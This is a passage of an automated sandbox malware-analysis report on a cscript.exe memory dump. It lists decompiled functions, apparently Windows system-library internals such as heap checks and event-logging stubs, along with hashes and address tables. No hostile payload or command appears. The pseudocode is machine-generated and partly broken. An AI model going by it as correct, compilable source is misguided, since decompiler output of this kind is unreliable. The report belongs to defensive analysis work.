Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 77e5c4ed693ee47b6dfb570ccc257eefd7301f6b2e5436d7dc46db1ce99b35b3
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 3F01D632604580DBEB269769C808FEABB9AFF41750F0900A2FD158B6B1D674D800C328

Uniqueness

Uniqueness Score: -1.00%

Function 0554FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0554FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x55ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E054D7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0554fe96
0x0554fe9e
0x0554fea1
0x0554fead
0x0554feb3
0x0554feb9
0x0554fec3
0x0554fed5
0x0554fec5
0x0554fece
0x0554fece
0x0554fee0
0x0554fee1
0x0554fee3
0x0554fee8
0x0554fefb

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b890e17c8282bd1394766dc96781cffb8315790e5f19564ab53efb7fb72c9c4
Instruction ID: 5816dec7463c80f1fc079932a6e764d81bf8a58ca8af30eb8a78dba5043bbe35
Opcode Fuzzy Hash: 7b890e17c8282bd1394766dc96781cffb8315790e5f19564ab53efb7fb72c9c4
Instruction Fuzzy Hash: 9C016270A00209EFCB14DFA9D546AAEB7F4FF04304F10415AB505DB382DA35D911CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05588F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E05588F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x55ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E054D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x05588f6a
0x05588f79
0x05588f81
0x05588f84
0x05588f8b
0x05588f91
0x05588f94
0x05588f9e
0x05588fb0
0x05588fa0
0x05588fa9
0x05588fa9
0x05588fbb
0x05588fbc
0x05588fbe
0x05588fc3
0x05588fd6

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0311c39d099beee308a9b859b250193b2317e7f7a8eabde91d956c6f94514416
Instruction ID: 0ff743eea1d59476ff2d5587f21a2f71739f5655953721abad21e1f1a14220f7
Opcode Fuzzy Hash: 0311c39d099beee308a9b859b250193b2317e7f7a8eabde91d956c6f94514416
Instruction Fuzzy Hash: 46014F74A0020CAFDB00EFA9D549AAEB7F4FF08300F50445AB905EB381EA34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0557131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0557131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x55ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E054D7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0557131b
0x0557132a
0x05571330
0x05571336
0x0557133e
0x05571341
0x05571344
0x0557134f
0x05571361
0x05571351
0x0557135a
0x0557135a
0x0557136c
0x0557136d
0x0557136f
0x05571374
0x05571387

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec18a76ddbd9d001ef70bec36dc774b7c2ce4f435f601f8de1ed1b981e6786e9
Instruction ID: 5d1f402c27412c3f66aff1ab6835f6585b3f167f3a033155782c2d838dc32219
Opcode Fuzzy Hash: ec18a76ddbd9d001ef70bec36dc774b7c2ce4f435f601f8de1ed1b981e6786e9
Instruction Fuzzy Hash: 3A013C71E0164CAFCB04EFA9D549AAEB7F4FF08700F40405AB945EB381EA349A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05571608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E05571608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x55ad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E054D7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x05571608
0x05571617
0x0557161d
0x05571625
0x05571628
0x0557162b
0x05571636
0x05571648
0x05571638
0x05571641
0x05571641
0x05571653
0x05571654
0x05571656
0x0557165b
0x0557166e

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e79feee62e6a941076ab40138af71ec17e8b34096b577c44d30b3ce60622a1c
Instruction ID: 68baf691af5bdcd7a0d377c2c6af76e267b34c1eef15f18cda3dcccd83951b32
Opcode Fuzzy Hash: 9e79feee62e6a941076ab40138af71ec17e8b34096b577c44d30b3ce60622a1c
Instruction Fuzzy Hash: 7BF04F71A04648EFDB04EFA9D409AAEB7B4FF04300F44405AA905EB281EA349A00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 054DC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054DC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E054DC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x54911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E055888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x054dc577
0x054dc57d
0x054dc581
0x054dc5b5
0x054dc5b9
0x054dc5ce
0x054dc5ce
0x054dc5ca
0x00000000
0x054dc5ca
0x054dc5c4
0x054dc5c8
0x00000000
0x00000000
0x00000000
0x054dc5ad
0x00000000
0x054dc5af

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464da66a0a23465340f6b6fcad630ae7bf3bf4b5c06bbc882c6394e09894db46
Instruction ID: bd3dac2667e4734e065ef4689286ff88c814e13e604b69fc2fbd1f45f3ab5bd5
Opcode Fuzzy Hash: 464da66a0a23465340f6b6fcad630ae7bf3bf4b5c06bbc882c6394e09894db46
Instruction Fuzzy Hash: 48F06DB29156B0DAD725D61481BCBA2FBE6AB056A0F5448A7D41787201C6A4DC80C660

Uniqueness

Uniqueness Score: -1.00%

Function 05588D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E05588D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x55ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E054D7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x05588d34
0x05588d43
0x05588d4b
0x05588d4e
0x05588d52
0x05588d5c
0x05588d6e
0x05588d5e
0x05588d67
0x05588d67
0x05588d79
0x05588d7a
0x05588d7c
0x05588d81
0x05588d94

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dae53539396f8f0558acfad992bbc6499f48746e591f57bebe4600e052d4b6b
Instruction ID: 6e49b47abbb7d0c8aef2a9b8511d8c784a11dced93e902c46468a63a4ef714a7
Opcode Fuzzy Hash: 5dae53539396f8f0558acfad992bbc6499f48746e591f57bebe4600e052d4b6b
Instruction Fuzzy Hash: 6CF05470E056489FDB14FFB9D545BAEB7B4FF14700F50849AE905EB291DA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05572073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E05572073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0556FD22(__ecx);
				_t19 =  *0x55a849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x55a8748; // 0x0
					if(__eflags <= 0) {
						E05571C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x55a8724 & 0x00000004;
							if(( *0x55a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x55a8724; // 0x0
					return E05568DF1(__ebx, 0xc0000374, 0x55a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x05572076
0x05572078
0x0557207d
0x05572083
0x055720a4
0x055720aa
0x055720ac
0x055720b7
0x055720ba
0x055720bc
0x055720c9
0x055720c9
0x055720d0
0x055720d2
0x00000000
0x055720d2
0x055720be
0x055720c3
0x055720c5
0x055720c7
0x00000000
0x00000000
0x055720c7
0x055720bc
0x055720d4
0x05572085
0x05572085
0x055720a3
0x055720a3

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5695adb30138f74dfb748db25bb887430c9340e40ad951624ba7a7eee2a0eea
Instruction ID: a4dd40f872cf82f8df5db0a1a81aea914d4384d3af9dba611dd8855aed729412
Opcode Fuzzy Hash: d5695adb30138f74dfb748db25bb887430c9340e40ad951624ba7a7eee2a0eea
Instruction Fuzzy Hash: E9F0202E9261E94ACE326B3430066E13FE1FB85110F090082E4A227200CA35A887DA30

Uniqueness

Uniqueness Score: -1.00%

Function 054F927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E054F927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E054FFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E054F92C6(_t11, _t14);
				}
				return _t11;
			}

0x054f9295
0x054f9299
0x054f929f
0x054f92aa
0x054f92ad
0x054f92ae
0x054f92af
0x054f92b0
0x054f92b4
0x054f92bb
0x054f92bb
0x054f92c5

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 416fd273a2bec93c7c40e37d10a575ff1a93623f4d1f27dc255468c16addd6c9
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: B0E0E5323405002BD7119F0ACC84B877659AF82720F01407EB6001E242C6E6D80887A0

Uniqueness

Uniqueness Score: -1.00%

Function 054D746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E054D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E054CEB70(__ecx, 0x55a79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E054F95D0();
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x054d746d
0x054d746d
0x054d746d
0x054d7471
0x054d7488
0x0551f92d
0x054d748e
0x054d7491
0x054d7495
0x0551f937
0x0551f93a
0x0551f94e
0x0551f953
0x0551f956
0x0551f956
0x054d7495
0x00000000
0x054d7488
0x054d7473
0x054d7478
0x054d747d
0x054d7481
0x00000000
0x054d7481
0x054d747d
0x054d747a
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc9d8d1ebbc23ca8d45faf71afb3df0210d50f154c3d511916794b4c5c4e74d
Instruction ID: 23871ca2082d2604d073017f9d40772ca432359f41061a26ca9ca485ea3fde45
Opcode Fuzzy Hash: ccc9d8d1ebbc23ca8d45faf71afb3df0210d50f154c3d511916794b4c5c4e74d
Instruction Fuzzy Hash: 49F0B435605144AADF03D768C460FFAFF62FF04210F54055BD852AB150E724980197F5

Uniqueness

Uniqueness Score: -1.00%

Function 05588CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05588CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x55ad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E054D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05588ce5
0x05588ced
0x05588cf0
0x05588cfb
0x05588d0d
0x05588cfd
0x05588d06
0x05588d06
0x05588d18
0x05588d19
0x05588d1b
0x05588d20
0x05588d33

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff0a10a820705bc0601ffad0b4904476f84715b59fcd53a817e83b2bd717e3ca
Instruction ID: bf3d98ed8d14c7aa99873fb0b9b94a04a546d7935fd8414f02f3a6a71fe0011d
Opcode Fuzzy Hash: ff0a10a820705bc0601ffad0b4904476f84715b59fcd53a817e83b2bd717e3ca
Instruction Fuzzy Hash: EEF08270A05248ABDB04EBA9D94AEAEB7B4FF09300F50059AF916EB281EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 054B4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054B4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E055888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E054DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5491030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x054b4f2e
0x054b4f34
0x054b4f38
0x05510b85
0x05510b85
0x05510b89
0x05510b9a
0x05510b9a
0x05510b9f
0x00000000
0x05510b9f
0x05510b94
0x05510b98
0x00000000
0x00000000
0x00000000
0x05510b98
0x054b4f3e
0x054b4f48
0x00000000
0x054b4f6e
0x00000000
0x054b4f70

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82c31d44f758f0c00d0232c33057a20a40c00dda7b95c23da681e10ecd330bb
Instruction ID: 6f2163b7d9308d07c670158b4b8ee280386c9128f05913cc1f0b42f0f09ff62d
Opcode Fuzzy Hash: a82c31d44f758f0c00d0232c33057a20a40c00dda7b95c23da681e10ecd330bb
Instruction Fuzzy Hash: 40F0E2725256948FEB70D718C28CF7ABBE6FB007B8F445466D806879B5C764ECC0C658

Uniqueness

Uniqueness Score: -1.00%

Function 05588B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E05588B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x55ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E054D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E054FB640(E054F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x05588b67
0x05588b6f
0x05588b72
0x05588b7d
0x05588b8f
0x05588b7f
0x05588b88
0x05588b88
0x05588b9a
0x05588b9b
0x05588b9d
0x05588ba2
0x05588bb5

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3863ff3179897efc40526245787ce3b866a3921623eb63f78d3dcb0a7b98a0b3
Instruction ID: 642feb4b906cd35158fa7b78b31aedd39bb244bdd0d70ab2a78b45f5b5b2c857
Opcode Fuzzy Hash: 3863ff3179897efc40526245787ce3b866a3921623eb63f78d3dcb0a7b98a0b3
Instruction Fuzzy Hash: 7BF082B0B14258ABDB00FBA9D90AEBFB7B4FF44300F44045ABA05EB380EA34D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 054EA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054EA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x55a7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E054FFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x054ea44b
0x054ea453
0x054ea472
0x054ea476
0x00000000
0x054ea493
0x054ea47a
0x054ea47f
0x054ea486
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f102f6ecd1b208e8882fee4bfd9bbf3e4b709b036d8abfbe18cfa5729304ef
Instruction ID: 27adf5f2d05fe6cef8daca06f0e416384fd3921cabcb3b75aff2648bed93a9e6
Opcode Fuzzy Hash: 11f102f6ecd1b208e8882fee4bfd9bbf3e4b709b036d8abfbe18cfa5729304ef
Instruction Fuzzy Hash: 4AE09272B11421ABD212DB19AC04FA7B39DEBD4651F0A403AF505C7210DA68DD16D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 054BF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E054BF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E054EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L054D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x054bf35d
0x054bf361
0x054bf367
0x054bf372
0x054bf38c
0x054bf38c
0x054bf394

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: dc88c8e4d1fcaefb3eb0c0c5534c1d7fc94202fedf1278deaf004deb4cbbdcb7
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: D1E0D832A40118BBDB2196D99D05FDBBBACDB44A61F000296F908D7150D5B59D00C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 054CFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E054CFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x54911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E055888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E054D0050(_t14);
				}
			}

0x054cff66
0x054cff6b
0x00000000
0x054cff8f
0x00000000
0x054cff8f

Memory Dump Source

